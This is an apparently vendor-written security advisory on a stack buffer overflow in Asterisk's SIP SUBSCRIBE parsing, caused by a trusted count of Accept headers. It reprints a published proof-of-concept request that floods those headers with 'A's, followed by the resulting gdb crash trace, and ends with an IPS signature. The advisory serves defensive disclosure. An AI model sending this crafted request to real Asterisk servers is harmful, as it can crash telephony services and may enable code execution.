Asterisk SUBSCRIBE Request Buffer Overflow Vulnerability

March 2, 2018

Asterisk is a software implementation of a telephone private branch exchange (PBX). It allows telephones interfaced with a variety of hardware technologies to make calls to one another, and to connect to telephony services, such as the public switched telephone network (PSTN) and voice over Internet Protocol (VoIP) services.

A memory corruption vulnerability has been reported on Asterisk. Due to improper handling of the SUBSCRIPBE request in the Session Initiation Protocol (SIP) implementation, a buffer overflow vulnerability can be triggered inside the service process memory space, An attacker could send a certain crafted SUBSCRIBE request, and cause Denial-of-Service or even remote code execution on the target server with the privilege of the service process.

SIP is a request-response based application layer protocol. The memory corruption vulnerability is triggered when the Asterisk SIP service parsing the SUBSCRIBE request's header. During this process, a sequence of C functions will be called:

pubsub_on_rx_subscribe_request(): Request handling
subscription_get_generator_from_rdata(): Construct the request object in memory

There is a kind of header for the SIP protocol called "Accept", which could appear in multiple entries inside the request header. When the function subscription_get_generator_from_rdata() handling a group of "Accept" request header, it will allocate a array in the memory for the contents. And the size of the array depends on a value num_accept_headers. However, this value comes from user-input, and was trusted unconditionally, causing an arbitrary write vulnerability inside the Asterisk service's memory space.

An Proof-of-Concept code has already been published on Github [1]:

 SUBSCRIBE sip:3000@ SIP/2.0 To:  From: Test  Call-ID: 1627b84b-b57d-4256-a748-30d01d242199 CSeq: 2 SUBSCRIBE Via: SIP/2.0/TCP;branch=z9hG4bK1627b84b-b57d-4256-a748-30d01d242199 Contact:  Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Accept: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (REPEAT ACCEPT FOR 50 TIMES) Event: message-summary Allow: Allow: SUBSCRIBE, NOTIFY, INVITE, ACK, CANCEL, BYE, REFER, INFO, OPTIONS, MESSAGE Authorization: Digest username="3000",realm="asterisk",nonce="1517181436/80170188d05f4af45b8530366c8e7e5e",uri="sip:",response="a4a88b777731349899227dc3170efdcf",algorithm=md5 Content-Length: 0 

It assigned the Accept header with 100 'A's. And such request will smash the stack with 0x41, overwrites critical pointers and causing a crash on the the service process.

 *** stack smashing detected ***: /opt/asterisk/sbin/asterisk terminated  Thread 25 "asterisk" received signal SIGABRT, Aborted. [Switching to Thread 0x7ffff0481700 (LWP 129)] 0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54	../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0  0x00007ffff5101428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1  0x00007ffff510302a in __GI_abort () at abort.c:89 #2  0x00007ffff51437ea in __libc_message (do_abort=do_abort@entry=1, fmt=fmt@entry=0x7ffff525b49f "*** %s ***: %s terminatedn") at ../sysdeps/posix/libc_fatal.c:175 #3  0x00007ffff51e515c in __GI___fortify_fail (msg=, msg@entry=0x7ffff525b481 "stack smashing detected") at fortify_fail.c:37 #4  0x00007ffff51e5100 in __stack_chk_fail () at stack_chk_fail.c:28 #5  0x00007ffff1613be2 in subscription_get_generator_from_rdata (handler=, handler=, rdata=) at res_pjsip_pubsub.c:755 #6  0x4141414141414141 in ?? () #7  0x4141414141414141 in ?? () #8  0x4141414141414141 in ?? () #9  0x4141414141414141 in ?? () #10 0x4141414141414141 in ?? () #11 0x4141414141414141 in ?? () #12 0x0041414141414141 in ?? () #13 0x4141414141414141 in ?? () .... 

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13238: Asterisk SUBSCRIBE Request Buffer Overflow